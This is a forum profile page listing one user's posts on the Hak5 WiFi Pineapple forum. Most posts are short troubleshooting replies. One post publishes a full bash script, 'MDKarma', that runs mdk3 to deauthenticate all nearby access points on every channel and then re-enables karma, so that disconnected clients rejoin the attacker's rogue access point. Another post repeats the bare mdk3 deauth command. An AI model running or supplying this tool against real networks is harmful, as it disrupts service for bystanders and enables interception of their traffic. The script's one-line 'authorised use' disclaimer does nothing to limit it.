Jump to content

Foxtrot

Hak5 Team
  • Posts

    2,171
  • Joined

  • Days Won

    155

Everything posted by Foxtrot

  1. Your username and password field is blank. -Foxtrot
  2. I think its only once on the same computer, however on another computer, you'd have to run it again. Could be wrong though, iv'e never used wp4.sh. Bit more info? does the website go weird looking i.e no CSS, or does it not load at all.. -Foxtrot
  3. post the output of lsusb and your setup script
  4. But they are only 3.2V, doesnt the pineapple require atleast 5.25V to run (USB port voltage) -Foxtrot
  5. Hey condor, what laptop is that? It looks like an Aspire One D270, but I cannot get mine to run linux. -Foxtrot
  6. If you're using the one with the pineapple, is 5 DBi
  7. Script Updated to hop on all channels. Should fix any issues to not deauthing some AP's. -Foxtrot
  8. It's possible channels 9 & 11 are also being deauthed because they overlap. -Foxtrot
  9. I'll see if I can do something later, and I'd like to do as much of it on my own as possible... -Foxtrot
  10. Is thier an ETA on 2.8.0 yet sebkinne? :D -Foxtrot
  11. Genius! Works great for me! Nice one mate -Foxtrot
  12. Done! Code has been updated :) -Foxtrot
  13. I'd love to make a module for this, but sadly i'm still learning PHP :D Hell, I'll take a wack at it soon haha -Foxtrot
  14. Ill tinker around with it again today, I've been looking to add what wlan* you want to use and tell it how long to deauth for. -Foxtrot
  15. Nice script petertfm! Kinda puts mine to shame. Boba Fett has PM'd me with screenshots of the script running and it is deauthing as it should... -Foxtrot
  16. hmmm. Strange it seems to d/c my laptop from my AP, but i can't do much testing as my antenna is broken atm ;(... I feel shame haha -Foxtrot
  17. Lol, If it said MD5 mismatch, why didn't you take the time to research it instead of rushing forward. Only thing I can suggest is to hold down the reset button on the bottom for 10 secs, and that probably won't work, if it doesn't, you need to do a clean flash over serial. -Foxtrot
  18. Dude. I thought you meant you were running it from the Advanced section, I said i think it might run. It is meant to be run from SSH. -Foxtrot
  19. Gah, Updated the first post with how to run it, should've put it there in the first place, Sorry! -Foxtrot
  20. Ah crap, replace the whole code in the .sh file you have with the one in the first post :) The problem is the time i set it to. I am working on getting it so you enter a time you want to deauth for, but bash is making me look like a fool haha If it still fails to deauth, increase the time in the sleep here mdk3 mon0 d & sleep 45 && killall mdk3 but on the script (Duh) -Foxtrot
  21. Would help if you included some more detail. It works fine for me. -Foxtrot
  22. Thats why I posted it :p -Foxtrot
  23. Edit : Basically, it won't run from a WPS script set with Whistle Masters 'button' module, because I plan to incorporate features that require user input. -Foxtrot
  24. Hey guys! I am currently making a script that basically : -Asks for a MAC to avoid. -Asks how long to deauth for -Asks what interface to deauth on -Disables karma -Puts wlan0 into RFMON (Monitor Mode) -Starts MDK3 Deauthing for x amount of seconds inputted at the beginning -After x amount of seconds, Stops MDK3 -Removes mon0 -Starts karma again The point of this script is that it deauths all nearby access points then enables karma so that the people will reconnect to the pineapple, Allthough this can be done manually I thought a nice script would be nice that did it for you :) Run this script by copy/pasting into a file and call it mdkarma.sh, then do chmod +x mdkarma.sh, then do ./mdkarma , Incase it wasn't obvious, when I update the script, you have to the new code with the existing script you have... ***Module Development and further script development*** As suggested by some people, I have decided to take a go at developing a pineapple module that will automate 'attacks' such as the MDKarma script and other tricks I have planned from a UI, as well as flexibiltiy such as being able to edit the scripts to suit your needs without SSH'in into the pineapple to edit... I hope you all share your edits too and continue with feedback that helps add features :).... -------------------------------------------------------------------------------------------------------------------------------------- Edit : Version 1.2 - Fixed Channel Hopping, Added Whitelisting and added spacing for easier reading :) Edit : Version 1.2.3 - Added Whitelisiting. Please give some feedback and any improvements :) Code : #!/bin/bash #Part of the Pineapple Mojito Framework #Made by Foxtrot #Version 1.2.3 #Intro echo "!! This script is to be used only for legal, safe and authorised uses !!" echo "MDKarma V1.2.3" sleep 6 #Ask how long to deauth for echo -n "How long (In Seconds) to deauth for? : "; read deauthTime #Ask what Interface echo -n "What interface would you like to deauth on? : "; read deauthInterface #Ask if you want to whitelist read -r -p "Do you want to add a whitelist? [Y/n] " response if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]] then echo " " echo "Whitelist Created!" echo " " touch whitelist.txt read -r -p "MAC Address to add : " macaddr echo $macaddr >> whitelist.txt else echo " " echo "Avoiding Whitelist Creation!" echo " " fi #Put wlan0 up echo "Checking Interface wlan0 is up...." wifi sleep 3 #Stop Karma echo " " echo "Killing Karma...." hostapd_cli -p /var/run/hostapd-phy0 karma_disable > /dev/null sleep 3 #Put deauthInterface into monitor mode echo " " echo "Putting $deauthInterface into monitor mode...." airmon-ng start $deauthInterface > /dev/null sleep 3 #Start deauthing with MDK3 and stop echo " " echo "Deauthing Access Points with MDK3...." mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 & sleep $deauthTime && killall mdk3 sleep 3 #Kill airmon-ng and start Karma again. echo "Removing mon0 and enabling karma...." airmon-ng stop mon0 > /dev/null wifi hostapd_cli -p /var/run/hostapd-phy0 karma_enable > /dev/null sleep 3 #Finish echo " " echo "MDKarma Finished!" -Foxtrot
  25. *Facepalm* I was using pipes instead of & :o Thanks for your help though:) -Foxtrot
×
×
  • Create New...